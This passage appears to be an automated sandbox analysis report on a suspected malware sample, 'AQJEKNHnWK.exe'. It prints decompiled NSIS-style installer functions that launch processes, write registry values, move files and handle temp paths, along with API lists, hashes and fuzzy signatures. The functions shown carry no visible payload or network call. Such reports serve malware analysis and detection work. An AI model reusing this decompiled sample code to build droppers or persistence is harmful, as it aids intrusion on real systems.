                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$AttributesCodeCreateExitFileObjectSingleTextWaitWindowlstrcat
                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                    • API String ID: 4003922372-501415292
                                                                    • Opcode ID: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                    • Instruction ID: c1fd9e20316fa7c66da1a85616afe7c8cb85e154ba4c90cc335e7add60896660
                                                                    • Opcode Fuzzy Hash: 0ef63ca706419f790af37db11aee738247e198a419f22565458099bb847621dc
                                                                    • Instruction Fuzzy Hash: 05016D71908119EBCF11AFA1DD85A9E7A72EB40345F20803BF601B51E1D7794E41DF5A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00405247, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31processCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00405247(CHAR* _a4, CHAR* _a8) {
				struct _PROCESS_INFORMATION _v20;
				signed char _t10;
				int _t12;

				0x7a1588->cb = 0x44;
				_t10 = GetFileAttributesA(_a8);
				if(_t10 == 0xffffffff || (_t10 & 0x00000010) == 0) {
					_a8 = 0;
				}
				_t12 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, _a8, 0x7a1588,  &_v20);
				if(_t12 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t12;
			}






                                                                    0x00405250
                                                                    0x0040525a
                                                                    0x00405265
                                                                    0x0040526b
                                                                    0x0040526b
                                                                    0x00405283
                                                                    0x0040528b
                                                                    0x00405290
                                                                    0x00000000
                                                                    0x00405296
                                                                    0x0040529a

                                                                    APIs
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 0040525A
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,007A1588,00000000), ref: 00405283
                                                                    • CloseHandle.KERNEL32(?), ref: 00405290
                                                                    Strings
                                                                    • Error launching installer, xrefs: 00405247
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AttributesCloseCreateFileHandleProcess
                                                                    • String ID: Error launching installer
                                                                    • API String ID: 2000254098-66219284
                                                                    • Opcode ID: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                    • Instruction ID: b26bea9810c6d819578ad0b391bf68386d489ca1151d2b7a54d6b9e5bc1a8a28
                                                                    • Opcode Fuzzy Hash: 1c7c90529dee7333dd01d23e0c4e2f505b8b5e8cc16b92771429ee34c240560b
                                                                    • Instruction Fuzzy Hash: A9F08C74800209AFEB045F64DC099AF3B68FF04314F00822AF825A52E0D338E5249F18
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004054CC, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004054CC(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                    0x004054cd
                                                                    0x004054e4
                                                                    0x004054ec
                                                                    0x004054ec
                                                                    0x004054f4

                                                                    APIs
                                                                    • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054D2
                                                                    • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403134,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 004054DB
                                                                    • lstrcatA.KERNEL32(?,00409010), ref: 004054EC
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004054CC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 2659869361-3916508600
                                                                    • Opcode ID: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                    • Instruction ID: 286163fd35dd309f39b0ef825f2df36d98798f7c410e009a08a94eb417524d97
                                                                    • Opcode Fuzzy Hash: 96c8907afa9cc8b7879c3c2b42171850de2edb10da8343977de176d435203a48
                                                                    • Instruction Fuzzy Hash: 17D0A7B2505D30AAD10122198C05FCB3A08CF47361B054023F540B21D2C63C1C418FFD
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00402386, Relevance: 6.1, APIs: 4, Instructions: 69registrystringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E00402386(void* __eax, void* __eflags) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t33;
				void* _t35;

				_t15 = E00402B61(__eax);
				_t33 =  *((intOrPtr*)(_t35 - 0x14));
				 *(_t35 - 0x30) =  *(_t35 - 0x10);
				 *(_t35 - 0x44) = E00402A9A(2);
				_t18 = E00402A9A(0x11);
				 *(_t35 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, 2, _t27, _t35 + 8, _t27);
				if(_t19 == 0) {
					if(_t33 == 1) {
						E00402A9A(0x23);
						_t19 = lstrlenA(0x40a418) + 1;
					}
					if(_t33 == 4) {
						_t24 = E00402A7D(3);
						 *0x40a418 = _t24;
						_t19 = _t33;
					}
					if(_t33 == 3) {
						_t19 = E00402EBD( *((intOrPtr*)(_t35 - 0x18)), _t27, 0x40a418, 0xc00);
					}
					if(RegSetValueExA( *(_t35 + 8),  *(_t35 - 0x44), _t27,  *(_t35 - 0x30), 0x40a418, _t19) == 0) {
						 *(_t35 - 4) = _t27;
					}
					_push( *(_t35 + 8));
					RegCloseKey();
				}
				 *0x7a3008 =  *0x7a3008 +  *(_t35 - 4);
				return 0;
			}










                                                                    0x00402387
                                                                    0x0040238c
                                                                    0x00402396
                                                                    0x004023a0
                                                                    0x004023a3
                                                                    0x004023b5
                                                                    0x004023bc
                                                                    0x004023c4
                                                                    0x004023d2
                                                                    0x004023d6
                                                                    0x004023e1
                                                                    0x004023e1
                                                                    0x004023e5
                                                                    0x004023e9
                                                                    0x004023ef
                                                                    0x004023f4
                                                                    0x004023f4
                                                                    0x004023f8
                                                                    0x00402404
                                                                    0x00402404
                                                                    0x0040241d
                                                                    0x0040241f
                                                                    0x0040241f
                                                                    0x00402422
                                                                    0x004024fb
                                                                    0x004024fb
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                    • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023BC
                                                                    • lstrlenA.KERNEL32(0040A418,00000023,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004023DC
                                                                    • RegSetValueExA.ADVAPI32(?,?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 00402415
                                                                    • RegCloseKey.ADVAPI32(?,?,?,0040A418,00000000,?,?,?,00000002,?,?,?,00000011,00000002), ref: 004024FB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CloseCreateValuelstrlen
                                                                    • String ID:
                                                                    • API String ID: 1356686001-0
                                                                    • Opcode ID: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                    • Instruction ID: 6c4994433d4710c3b0718cfc4a621a0491726581bd8d7e4452a281464ebddd5e
                                                                    • Opcode Fuzzy Hash: 21fc3b8ac64efd4591be3bedd578ad52bcbb91afdce752df37845370db120b95
                                                                    • Instruction Fuzzy Hash: 9911BEB1E00218BEEB10EFA1DE8DEAF767CEB50758F10403AF904B71C1D6B85D019A68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401F4B, Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 85%
                                                                    			E00401F4B(char __ebx, char* __edi, char* __esi) {
				char* _t21;
				int _t22;
				void* _t33;

				 *((intOrPtr*)(_t33 + 8)) = _t33 - 0x58;
				_t21 = E00402A9A(0xffffffee);
				 *(_t33 - 0x2c) = _t21;
				_t22 = GetFileVersionInfoSizeA(_t21, _t33 - 0x30);
				 *__esi = __ebx;
				 *(_t33 - 8) = _t22;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t33 - 4)) = 1;
				if(_t22 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp - 0x34) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp + 8;
							if(VerQueryValueA( *(__ebp - 0x34), 0x409010, __ebp + 8, __ebp - 0x44) != 0) {
								 *(__ebp + 8) = E0040591D(__esi,  *((intOrPtr*)( *(__ebp + 8) + 8)));
								 *(__ebp + 8) = E0040591D(__edi,  *((intOrPtr*)( *(__ebp + 8) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp - 0x34));
						GlobalFree();
					}
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}






                                                                    0x00401f50
                                                                    0x00401f53
                                                                    0x00401f5b
                                                                    0x00401f60
                                                                    0x00401f65
                                                                    0x00401f69
                                                                    0x00401f6c
                                                                    0x00401f6e
                                                                    0x00401f75
                                                                    0x00401f7e
                                                                    0x00401f86
                                                                    0x00401f89
                                                                    0x00401f9e
                                                                    0x00401fa4
                                                                    0x00401fb7
                                                                    0x00401fc0
                                                                    0x00401fcc
                                                                    0x00401fd1
                                                                    0x00401fd1
                                                                    0x00401fb7
                                                                    0x00401fd4
                                                                    0x00401be1
                                                                    0x00401be1
                                                                    0x00401f89
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                    • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401F60
                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F7E
                                                                    • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F97
                                                                    • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401FB0
                                                                      • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                    • String ID:
                                                                    • API String ID: 1404258612-0
                                                                    • Opcode ID: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                    • Instruction ID: 008c8d9b42a3eb8001c26ba2e1db8d9e55e1e47276d372f8316595cd69ee8cc3
                                                                    • Opcode Fuzzy Hash: f598b284a3ed536213d34974b8b84d86eb34143baa9c6cdb9838dc1c0fb271d9
                                                                    • Instruction Fuzzy Hash: 97110AB1900209BEDB01DFA5D9859EEBBB9EF04354F20803AF505F61A1D7389A54DB28
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004021F6, Relevance: 6.1, APIs: 4, Instructions: 51stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 92%
                                                                    			E004021F6() {
				void* __ebx;
				char _t33;
				CHAR* _t35;
				CHAR* _t38;
				void* _t40;

				_t35 = E00402A9A(_t33);
				 *(_t40 + 8) = _t35;
				_t38 = E00402A9A(0x11);
				 *(_t40 - 0x64) =  *(_t40 - 8);
				 *((intOrPtr*)(_t40 - 0x60)) = 2;
				( &(_t35[1]))[lstrlenA(_t35)] = _t33;
				( &(_t38[1]))[lstrlenA(_t38)] = _t33;
				E004059E1(_t33, 0x40a418, _t38, 0x40a418, 0xfffffff8);
				lstrcatA(0x40a418, _t38);
				 *(_t40 - 0x5c) =  *(_t40 + 8);
				 *(_t40 - 0x58) = _t38;
				 *(_t40 - 0x4a) = 0x40a418;
				 *((short*)(_t40 - 0x54)) =  *((intOrPtr*)(_t40 - 0x1c));
				E00404D62(_t33, 0x40a418);
				if(SHFileOperationA(_t40 - 0x64) != 0) {
					E00404D62(0xfffffff9, _t33);
					 *((intOrPtr*)(_t40 - 4)) = 1;
				}
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t40 - 4));
				return 0;
			}








                                                                    0x004021fc
                                                                    0x00402200
                                                                    0x00402208
                                                                    0x0040220e
                                                                    0x00402211
                                                                    0x0040221e
                                                                    0x0040222f
                                                                    0x00402233
                                                                    0x0040223a
                                                                    0x00402243
                                                                    0x0040224b
                                                                    0x0040224e
                                                                    0x00402251
                                                                    0x00402255
                                                                    0x00402266
                                                                    0x0040226f
                                                                    0x004026da
                                                                    0x004026da
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                    • lstrlenA.KERNEL32 ref: 00402218
                                                                    • lstrlenA.KERNEL32(00000000), ref: 00402222
                                                                    • lstrcatA.KERNEL32(0040A418,00000000,0040A418,000000F8,00000000), ref: 0040223A
                                                                      • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                      • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                      • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                      • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                      • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                      • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                      • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                    • SHFileOperationA.SHELL32(?,?,0040A418,0040A418,00000000,0040A418,000000F8,00000000), ref: 0040225E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: lstrlen$MessageSend$lstrcat$FileOperationTextWindow
                                                                    • String ID:
                                                                    • API String ID: 3674637002-0
                                                                    • Opcode ID: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                    • Instruction ID: 47f3a671e7cdcee79df8a3fca2d1c3b111535efa636a59b05b872e219512585c
                                                                    • Opcode Fuzzy Hash: 059ecdbd16b9b2e6cf56c4f05bd242d37f3343397a73b98e855651f0486c5599
                                                                    • Instruction Fuzzy Hash: 931156B1904218AACB10EFEA8945A9EB7F9DF45324F20813BF115FB2D1D67889458B29
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040555F, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040555F(CHAR* _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t8 = _a4;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E004054F7(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                                    0x00405568
                                                                    0x0040556f
                                                                    0x00405572
                                                                    0x00405577
                                                                    0x0040558a
                                                                    0x004055a4
                                                                    0x00000000
                                                                    0x004055a4
                                                                    0x0040558e
                                                                    0x0040558f
                                                                    0x00405592
                                                                    0x00405593
                                                                    0x0040559b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040559d
                                                                    0x004055a0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004055a0
                                                                    0x00000000
                                                                    0x00405580
                                                                    0x00000000
                                                                    0x00405581

                                                                    APIs
                                                                    • CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\AQJEKNHnWK.exe" ,00000000), ref: 0040556D
                                                                    • CharNextA.USER32(00000000), ref: 00405572
                                                                    • CharNextA.USER32(00000000), ref: 00405581
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 0040555F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CharNext
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 3213498283-3916508600
                                                                    • Opcode ID: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                    • Instruction ID: b67b0c8a829b4c1e6cbedfc5f168e3ec28866c166e563da40a1f411eca8696ac
                                                                    • Opcode Fuzzy Hash: b48b76b68b78db8838368ae70d007d1d6cb713de63b14fd1025e4e50f0193877
                                                                    • Instruction Fuzzy Hash: 6BF02762D04A217AEB2222A84C44B7B57ADCF98310F040433E500F61D492BC4C828FAA
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00401D8E, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 61%
                                                                    			E00401D8E() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 8)), 0x5a);
				0x4093d8->lfHeight =  ~(MulDiv(E00402A7D(2), _t6, 0x48));
				 *0x4093e8 = E00402A7D(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x4093ef = 1;
				 *0x4093ec = _t11 & 0x00000001;
				 *0x4093ed = _t11 & 0x00000002;
				 *0x4093ee = _t11 & 0x00000004;
				E004059E1(_t18, _t24, _t26, 0x4093f4,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x4093d8);
				_push(_t14);
				_push(_t26);
				E0040591D();
				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                    0x00401d9c
                                                                    0x00401db5
                                                                    0x00401dbf
                                                                    0x00401dc4
                                                                    0x00401dcf
                                                                    0x00401dd6
                                                                    0x00401de8
                                                                    0x00401dee
                                                                    0x00401df3
                                                                    0x00401dfd
                                                                    0x00402536
                                                                    0x00401581
                                                                    0x004028d7
                                                                    0x00402932
                                                                    0x0040293e

                                                                    APIs
                                                                    • GetDC.USER32(?), ref: 00401D95
                                                                    • GetDeviceCaps.GDI32(00000000), ref: 00401D9C
                                                                    • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401DAB
                                                                    • CreateFontIndirectA.GDI32(004093D8), ref: 00401DFD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.215788506.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.215777315.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215803259.0000000000407000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215810653.0000000000409000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215841924.000000000077A000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215846812.0000000000784000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215853260.0000000000788000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215865050.0000000000795000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215869937.00000000007A1000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215874471.00000000007A9000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215879765.00000000007AC000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.215903702.00000000007CC000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CapsCreateDeviceFontIndirect
                                                                    • String ID:
                                                                    • API String ID: 3272661963-0
                                                                    • Opcode ID: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                    • Instruction ID: 1900d90730e4b23e0012eb78001e2751c68d3a10a93a8e7648ac2a5c53f67619
                                                                    • Opcode Fuzzy Hash: 512a0c0f17e64d15ab745448d4c3f8d5e5981439fe6f63d44a40da757e21bc15
                                                                    • Instruction Fuzzy Hash: 98F0C870948340EFEB009B70AEAEB9A3F649719301F144479FA41B61E3C6BC18008F3E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00404CA1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00404CA1(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t19;
				long _t23;

				if(_a8 != 0x102) {
					__eflags = _a8 - 2;
					if(_a8 == 2) {
						 *0x40929c =  *0x40929c | 0xffffffff;
						__eflags =  *0x40929c;
					}
					__eflags = _a8 - 0x200;
					if(_a8 != 0x200) {
						_t23 = _a16;
						goto L9;
					} else {
						_t19 = IsWindowVisible(_a4);
						__eflags = _t19;
						if(_t19 == 0) {
							L12:
							_t23 = _a16;
							L13:
